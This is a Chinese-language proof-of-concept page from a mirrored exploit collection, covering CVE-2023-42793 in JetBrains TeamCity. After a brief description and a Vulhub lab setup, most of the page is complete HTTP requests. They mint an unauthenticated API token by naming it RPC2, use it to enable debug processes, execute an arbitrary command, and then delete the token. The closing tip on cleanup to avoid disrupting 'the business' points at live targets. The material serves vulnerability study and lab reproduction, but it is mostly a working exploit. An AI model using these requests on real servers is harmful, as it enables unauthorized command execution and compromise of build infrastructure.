mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
104 lines
4.1 KiB
Markdown
104 lines
4.1 KiB
Markdown
# Jetbrains TeamCity 认证绕过导致远程命令执行漏洞 CVE-2023-42793
|
||
|
||
## 漏洞描述
|
||
|
||
TeamCity 是 JetBrains 的构建管理和持续集成服务器。
|
||
|
||
在 TeamCity 2023.05.3 版本及以前,存在一处由于逻辑错误导致的认证绕过漏洞,攻击者利用该漏洞最终可以在目标服务器上执行任意命令。
|
||
|
||
参考链接:
|
||
|
||
- [https://www.sonarsource.com/blog/teamcity-vulnerability/](https://www.sonarsource.com/blog/teamcity-vulnerability/)
|
||
- [https://blog.projectdiscovery.io/cve-2023-42793-vulnerability-in-jetbrains-teamcity/](https://blog.projectdiscovery.io/cve-2023-42793-vulnerability-in-jetbrains-teamcity/)
|
||
|
||
## 环境搭建
|
||
|
||
Vulhub 执行如下命令启动一个 TeamCity 2023.05.3 服务器:
|
||
|
||
```
|
||
docker compose up -d
|
||
```
|
||
|
||
服务启动后,需要打开 `http://your-vps-ip:8111/` 并执行一系列初始化操作,创建一个管理员账户。
|
||
|
||
|
||
|
||
## 漏洞复现
|
||
|
||
造成这个漏洞的原因是 TeamCity 内部对于所有以 `/RPC2` 为后缀结尾的请求都不认证权限。
|
||
|
||
而正好添加 API Token 的请求的结尾参数是 Token 的名字,我们可以添加一个名字为 `RPC2` 的 API Token:
|
||
|
||
```
|
||
POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
|
||
Host: your-ip:8111
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept: */*
|
||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||
Connection: close
|
||
Cache-Control: max-age=0
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 0
|
||
```
|
||
|
||
|
||
|
||
这样就成功绕过权限认证生成了一个新的 Token:
|
||
|
||
```
|
||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><token name="RPC2" creationTime="2024-07-18T02:08:21.088Z" value="eyJ0eXAiOiAiVENWMiJ9.NU5Lc3lneWFhQ19CRUp3MDE4bnFUTTVGck1N.N2M4NDQ5MmEtYzQwOS00NjE5LTliOWMtNGY3YzQwMDNmNDY4"/>
|
||
```
|
||
|
||
使用该 Token 来开启调试模式:
|
||
|
||
```
|
||
POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
|
||
Host: your-ip:8111
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept: */*
|
||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||
Connection: close
|
||
Cache-Control: max-age=0
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 0
|
||
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.NU5Lc3lneWFhQ19CRUp3MDE4bnFUTTVGck1N.N2M4NDQ5MmEtYzQwOS00NjE5LTliOWMtNGY3YzQwMDNmNDY4
|
||
```
|
||
|
||
|
||
|
||
开启调试模式后,就可以执行任意命令了:
|
||
|
||
```
|
||
POST /app/rest/debug/processes?exePath=id HTTP/1.1
|
||
Host: your-ip:8111
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept: */*
|
||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||
Connection: close
|
||
Cache-Control: max-age=0
|
||
Content-Length: 0
|
||
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.NU5Lc3lneWFhQ19CRUp3MDE4bnFUTTVGck1N.N2M4NDQ5MmEtYzQwOS00NjE5LTliOWMtNGY3YzQwMDNmNDY4
|
||
```
|
||
|
||
|
||
|
||
利用结束后,最好能够删除名为 `RPC2` 的 API Token,避免对业务造成问题:
|
||
|
||
```
|
||
DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
|
||
Host: your-ip:8111
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept: */*
|
||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||
Connection: close
|
||
Cache-Control: max-age=0
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 0
|
||
```
|
||
|
||
|